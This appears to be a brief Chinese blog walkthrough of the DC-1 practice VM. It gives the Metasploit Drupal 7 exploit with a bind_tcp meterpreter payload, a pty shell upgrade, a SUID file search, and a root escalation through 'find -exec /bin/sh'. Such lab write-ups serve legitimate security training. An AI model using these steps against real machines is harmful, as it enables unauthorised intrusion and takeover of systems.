DC1(msf drupal7+suid-find提权)

这边我们靶机是仅主机模式,IP是192.168.56.101,,直接上msf拿到shell,  不过payload要改一下 改成php/meterperter/bind_tcp

 

DC1(msf drupal7+suid-find提权)

 

 

 

拿到shell了 ,采用交互式

python -c "import pty;pty.spawn('/bin/bash')"

 

find / -type f -perm -u=s 2>/dev/null #find查看root
find /var/www -exec "/bin/sh" \; # find提权

 

 

DC1(msf drupal7+suid-find提权)

上一篇:mac os 安装mongodb5.0.2数据库的笔记


下一篇:linux – 什么存储在/ dev / pts文件中,我们可以打开它们吗?